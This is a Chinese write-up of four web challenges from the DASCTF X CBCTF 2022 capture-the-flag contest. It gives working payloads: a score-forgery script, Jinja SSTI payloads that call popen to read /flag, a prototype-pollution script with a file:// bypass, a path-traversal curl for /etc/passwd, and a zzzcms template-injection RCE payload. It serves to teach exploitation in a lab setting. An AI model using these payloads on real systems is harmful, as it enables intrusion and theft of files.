【Web】DASCTF X CBCTF 2022九月挑战赛 题解

目录

dino3d 

Text Reverser 

cbshop

zzz_again


dino3d 

进来是一个js小游戏

先随便玩一下,显示要玩够1000000分

 

直接console改分数会被检测

 

先是JSFinder扫一下,扫出了check.php

到js里关键词索引搜索check.php

 搜索sn,发现传入的参数是score和checkCode

搜索checkCode 

 

搜索salt

 

import requests
from hashlib import md5
import time
target = "http://node5.buuoj.cn:27231/check.php"headers = {"Content-type": "application/x-www-form-urlencoded; charset=UTF-8"
}body = {"score": "10000000","checkCode": md5("10000000DASxCBCTF_wElc03e".encode()).hexdigest(),"tm": str((time.time()))[:10]
}res = requests.post(target, headers=headers, data=body)
print(res.text)

 

 

Text Reverser 

先随便测试功能

测出有对SSTI的waf

 

给一段字符逆向脚本

s = "待逆向字符"
r = s[::-1]
print(r)

 {% print(7*7)%}

 

{%print ''.__class__.__bases__[0].__subclasses__()%}

 

 

找到os在132索引处

{%print ''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('tail /flag').read()%}

 

cbshop

 

先随便登录一下 ,有10元,但flag要11元

 拿到附件审源码

flag位置在了/flag

 

admin信息 

 

直接放控制台运行

 

成功以admin登录  

 

 现在钱是够够的了 

 但还是不能直接买flag

 

回头看源码,有这样一段逻辑

 

需要user.token属性为true

但代码中并没有定义token

 

可以在buyApi中利用assign打原型链污染

 先令user.username为__proto__,污染Object.token属性

{"name": "/flag", "id": 2, "token": true}

 打入污染

 再以admin登录,去买flag,发现还是有限制要绕(就是传入的json数据不能包含flag关键字)

 

使用URL 实例可以正常读取文件,将 flag 进行url编码从而绕过

import requests
session = requests.Session()url = "http://d6b2d3d7-8768-4eac-9cbb-f2f2be45b4ff.node5.buuoj.cn:81/" # 题目urldef login():data = {"username": "admin","password": "\uDE00admi"}session.post(url + "login", json = data)def changeUsername():data = { "username": "__proto__" }session.post(url + "changeUsername", json = data)def buyFlag():data = {"name":{"href": 'file:///fl%61g',"origin": 'null',"protocol": 'file:',"username": '',"password": '',"host": '',"hostname": '',"port": '',"pathname": '/fl%61g',"search": '',"searchParams": "URLSearchParams {}","hash": ''},"id":2,"token":True}res = session.post(url + "buy", json = data)return res.textif __name__ == '__main__':login()changeUsername()flag = buyFlag()print(flag)

 

zzz_again

 

 

XCTF高校挑战赛与zzzcms 2.1.4最新版前台RCE | Matrix 

经过验证可以进行一个任意文件的读,但不知道flag路径,走不下去 

curl -d "template=../../../../../../../../etc/passwd" -X POST http://node5.buuoj.cn:29834/search/

 

再去搜RCE的洞 

Vuls/zzzcms/zzzphp V2.1.0 RCE/zzzphp V2.1.0 RCE.md at main · metaStor/Vuls · GitHub 

直接照着打也打不通,高版本模板注入RCE入口的location估计不能是search了

进入解析模板

 解析location

当location=list时,跟进parserList 

 

最后进到parserListPage 

 

发现其是从url中接参,最后做一些简单的拼接并替换掉正在执行的模板文件

 

一顿逻辑走下来后发现没有waf,到此我们就可以成功得到恶意的模板文件

 

接着再来看parserIfLabel对模板文件是怎么处理的

 dangerkey有waf处理

 过掉waf后可以往下走到eval拼接命令执行

最终payload:

/?location=list&aaa={if:=strtolower("SYSTEM")("cat /f111l00g")}{end if}&aaa=111

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/826958.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

3-羟基丙酸(3-HP)应用前景广阔 生物基3-羟基丙酸市场占比将不断提升

3-羟基丙酸(3-HP)应用前景广阔 生物基3-羟基丙酸市场占比将不断提升 合成技术是制约3-羟基丙酸规模化应用的重要因素。3-羟基丙酸合成技术包括化学合成法、生物合成法两大类,其中化学合成法是主流生产工艺,但化学合成法存在工艺复…

vue 手写手动轮播 且图片宽度不一样

vue 手写手动轮播 且图片宽度不一样 轮播图样式 <div class"case-imgs" v-if"length ! 0"><div :class"[length 1 ? big : small, imgs-wrapper]"><img class"case-img" v-for"(m, n) in activeParam.imgs"…

.netcore+vue新生分班系统的设计与实现

.netcore vue新生分班系统的设计与实现说明文档 运行前附加数据库.mdf&#xff08;或sql生成数据库&#xff09; 主要技术&#xff1a; 基于.net core架构和mysql数据库vue 东北石油大学新生分班系统的设计与实现 功能模块&#xff1a; 登录 注册学生 忘记密码 系统首顶 个…

Qt5之创建数据库连接、打开数据库、查询数据库和获取结果集

2024年4月22日&#xff0c;周一下午 注意&#xff0c;下面这段代码不能直接运行&#xff0c;只是给大家一个大概的思路 所需头文件 #include <QSqlDatabase> #include <QDebug> #include <QSqlError> #include <QSqlQuery>创建数据库连接 QSqlDatab…

完成学校官网页面制作

<!DOCTYPE html> <html lang"en"> <head> <meta charset"UTF-8"> <title>教务系统</title> <style> .wap{ margin:0 auto; width:955px; } .top{ height:150px; padding-left:85px; …

【JS】react antd 项目如何让Table组件表格滚动播放

目录 实现原理如何判断是否滚到到底部&#xff1f;停止和开始滚动的控制优化滚动体验 实现原理 某个函数实现向下滚动1个像素效果&#xff0c;使用setInterval每隔1秒都调用这个函数&#xff0c;就实现了滚动的效果。 init () > {const that this;this.timeInterval se…

期货开户交易不要自我吹嘘

总而言之&#xff0c;盈利和你没任何关系&#xff0c;不要自我吹嘘自我眩晕&#xff0c;他只是市场给予你的恩赐而已。不是你具备了什么盈利的能力。如果你努力奋斗在交易市场上了&#xff0c;或是在寻找致胜之法&#xff0c;从现在起&#xff0c;你应该知道这对你的交易&#…

easyexcel的使用

注解 ExcelProperty ExcelProperty是EasyExcel库中的一个注解&#xff0c;用于在导出或导入Excel文件时&#xff0c;把Excel的列与Java对象的字段进行映射。 ExcelIgnore ExcelIgnore是EasyExcel库中的一个注解&#xff0c;用于在导出或导入Excel文件时&#xff0c;标注在实…

DHCP服务器配置故障转移后显示红色箭头、与伙伴服务器失去联系的解决方案

一、遇到的故障现象&#xff1a; &#xff08;主DHCP服务器与备用DHCP服务器连通性正常&#xff0c;在故障转移选项卡上却显示与伙伴失去联系、伙伴关闭&#xff0c;且ipv4协议旁边显示一个红色的小箭头&#xff09;&#xff0c;正常情况下是绿色 &#xff08;一&#xff09;…

外包干了6天,技术明显退步。。。

我是一名大专生&#xff0c;自19年通过校招进入湖南某软件公司以来&#xff0c;便扎根于功能测试岗位&#xff0c;一晃便是近四年的光阴。今年3月&#xff0c;我如梦初醒&#xff0c;意识到长时间待在舒适的环境中&#xff0c;已让我变得不思进取&#xff0c;技术停滞不前。更令…

达梦数据库的监听进程

达梦数据库&#xff08;DMDB&#xff09;也同样有监听进程&#xff0c;其主要职责是监听来自客户端的连接请求。这里的监听进程指的是达梦数据库服务启动后&#xff0c;在操作系统级别监听特定TCP/IP端口&#xff08;默认情况下是5236&#xff0c;但这可以配置&#xff09;的进…

金三银四面试题(二十):单例模式知多少?

设计模式也是面试中的热门考题&#xff0c;基本这个部分都是问问你知不知道XXX设计模式&#xff0c;有什么用&#xff0c;优缺点&#xff0c;然后再现场手写一个demo。很多时候是和spring一起考的&#xff0c;问问你知不知道spring框架用了哪些设计模式。今天我们来先看看单例模…

代码+视频,R语言对数据进行多重插补后回归分析

我们在临床做回顾性研究分析中经常要面对数据缺失的问题&#xff0c;如果数据缺失量大就会对我们的研究结果产生影响&#xff0c;近年来&#xff0c;对数据进行多重插补广泛应用于SCI论文中。我们在之前的文章中已经演示了使用SPSS对数据进行多重插补并分析。今天&#xff0c;我…

贪吃蛇的简单实现(c语言)

前言&#xff1a;学完了C语言的基础语法&#xff0c;和一点数据结构的知识&#xff0c;拿贪吃蛇来练练手&#xff0c;并熟悉以前的知识。写完之后&#xff0c;有一种成就感&#xff0c;为以后的学习饱满激情。 注意这里的讲解是由部分到整体的思路。 目录 控制台不能是终端&am…

ubuntu环境下使用g++把c++编译成汇编语言(暂时)

1. 引言 为了深入理解c&#xff0c;决定学习一些简单的汇编语言。使用ubuntu系统下g很容易将一个c的文件编译成汇编语言。本文使用此方法&#xff0c;对一个简单的c文件编译成汇编语言进行理解。 2.示例 文件名&#xff1a;reorder_demo.cpp #include<stdio.h>typede…

逻辑回归+分类的评估方式

一&#xff1a;什么是逻辑回归 解决二分类问题 二&#xff1a;损失及优化 三&#xff1a;逻辑回归API 四&#xff1a;案例 五&#xff1a;分类的评估方式 评估公式 分类评估API ROC与AUC&#xff08;介绍API&#xff09;衡量不平衡样本 ROC曲线的绘制 分类中解决类别不平衡

嵌入式学习57-ARM6(内核编译)

知识零碎&#xff1a; arm2440 精简指令集架构 …

跨境电商爬数据

跨境电商爬虫是一种用于获取跨境电商平台上商品信息的自动化工具。它通过模拟用户在网页上的操作&#xff0c;自动访问跨境电商平台的页面&#xff0c;并提取所需的商品数据。跨境电商爬虫可以帮助商家或研究人员快速获取大量商品信息&#xff0c;进行市场分析、价格比较、竞争…

Java锁机制

锁的类型 悲观锁 vs 乐观锁&#xff1a; 悲观锁&#xff1a;悲观锁的思想是在操作数据之前先获取锁&#xff0c;认为数据在操作期间可能会被其他事务修改&#xff0c;因此需要先加锁保护数据。 常见的悲观锁实现包括数据库中的行级锁、表级锁、页级锁等&#xff0c;以及Java中…

HackmyVM-----Boxing靶机

文章目录 正常打靶流程1.获取靶机IP地址2.获取靶机端口服务3.访问网页4.添加域名WindowsLinux 5.访问域名6.nc反弹shell 7.结束 正常打靶流程 1.获取靶机IP地址 ┌──(root㉿kali)-[/home/kali] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, …